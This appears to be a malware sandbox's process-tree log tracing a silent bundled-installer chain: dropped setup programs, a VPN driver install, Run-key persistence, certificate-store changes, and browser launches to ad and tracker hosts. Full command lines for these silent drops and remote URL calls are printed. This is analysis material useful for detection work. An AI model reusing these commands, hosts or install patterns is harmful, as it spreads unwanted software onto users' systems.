C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72110⤵
- Adds Run key to start application
- Enumerates system info in registry
PID:7456 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffef06146f8,0x7ffef0614708,0x7ffef061471811⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2284 /prefetch:211⤵PID:8088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2584 /prefetch:811⤵PID:588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:311⤵PID:6012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:111⤵PID:7200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:111⤵PID:6404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:111⤵PID:6688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4280 /prefetch:111⤵PID:7800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:111⤵PID:5276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:111⤵PID:7516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2192 /prefetch:111⤵PID:4260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:111⤵PID:1300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:811⤵PID:3900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:811⤵PID:6256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6080 /prefetch:211⤵PID:1704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:111⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:111⤵PID:1968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:111⤵PID:5828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:111⤵PID:5612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:111⤵PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:111⤵PID:2712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:111⤵PID:6252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:111⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:111⤵PID:3208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:111⤵PID:6152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4428 /prefetch:111⤵PID:2916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:111⤵PID:6556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2848 /prefetch:311⤵PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:111⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:111⤵PID:6804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,9356360311193135359,4781316696055953760,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:111⤵PID:6712
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\is-3QK9H.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-3QK9H.tmp\WEATHER Manager.tmp" /SL5="$30174,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵PID:4416
-
C:\Users\Admin\AppData\Local\Temp\is-NKA71.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NKA71.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4580 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-NKA71.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-NKA71.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629314406 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:6688
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:3240 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629314406 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:7884
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\is-V050C.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-V050C.tmp\VPN.tmp" /SL5="$102AE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4828 -
C:\Users\Admin\AppData\Local\Temp\is-4GVQE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4GVQE.tmp\Setup.exe" /silent /subid=7207⤵PID:5088
-
C:\Users\Admin\AppData\Local\Temp\is-OHG26.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-OHG26.tmp\Setup.tmp" /SL5="$2033A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-4GVQE.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6460 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:7084
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4416
-
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
- Checks SCSI registry key(s)
PID:2848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:5236
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:8096
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵PID:3972
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7436
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3048
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 18806⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3452
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
PID:864 -
C:\Users\Admin\AppData\Local\Temp\is-0BRP0.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-0BRP0.tmp\MediaBurner2.tmp" /SL5="$202BC,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\is-U4HP1.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-U4HP1.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵PID:4812
-
C:\Program Files\Internet Explorer\FMWZIGNJLC\ultramediaburner.exe"C:\Program Files\Internet Explorer\FMWZIGNJLC\ultramediaburner.exe" /VERYSILENT8⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\is-TRCFT.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-TRCFT.tmp\ultramediaburner.tmp" /SL5="$3038E,281924,62464,C:\Program Files\Internet Explorer\FMWZIGNJLC\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
PID:1464 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:8068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1d-93adc-90c-3af8e-ae1d495467639\Lezhaeshaejejy.exe"C:\Users\Admin\AppData\Local\Temp\1d-93adc-90c-3af8e-ae1d495467639\Lezhaeshaejejy.exe"8⤵PID:7112
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:7788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1c4,0x1c8,0x1cc,0x1c0,0x1d0,0x7ffef06146f8,0x7ffef0614708,0x7ffef061471810⤵PID:7660
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
- Suspicious use of SendNotifyMessage
PID:7236 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef06146f8,0x7ffef0614708,0x7ffef061471810⤵PID:4280
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵PID:7688
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef06146f8,0x7ffef0614708,0x7ffef061471810⤵PID:480
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
- Suspicious use of SendNotifyMessage
PID:1728 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef06146f8,0x7ffef0614708,0x7ffef061471810⤵PID:3108
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:4516
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef06146f8,0x7ffef0614708,0x7ffef061471810⤵
- Enumerates connected drives
PID:4580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\68-3f6e6-2ae-42993-61cae22693695\Faejaelaxugae.exe"C:\Users\Admin\AppData\Local\Temp\68-3f6e6-2ae-42993-61cae22693695\Faejaelaxugae.exe"8⤵PID:7936
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kdwoube2.cmw\GcleanerEU.exe /eufive & exit9⤵PID:6996
-
C:\Users\Admin\AppData\Local\Temp\kdwoube2.cmw\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kdwoube2.cmw\GcleanerEU.exe /eufive10⤵PID:5872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5872 -s 29611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6496
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dal3isfo.g22\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:804
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:6616
-
-
C:\Users\Admin\AppData\Local\Temp\dal3isfo.g22\installer.exeC:\Users\Admin\AppData\Local\Temp\dal3isfo.g22\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
PID:2004 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\dal3isfo.g22\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\dal3isfo.g22\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629314406 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:6748
-
-
-
-
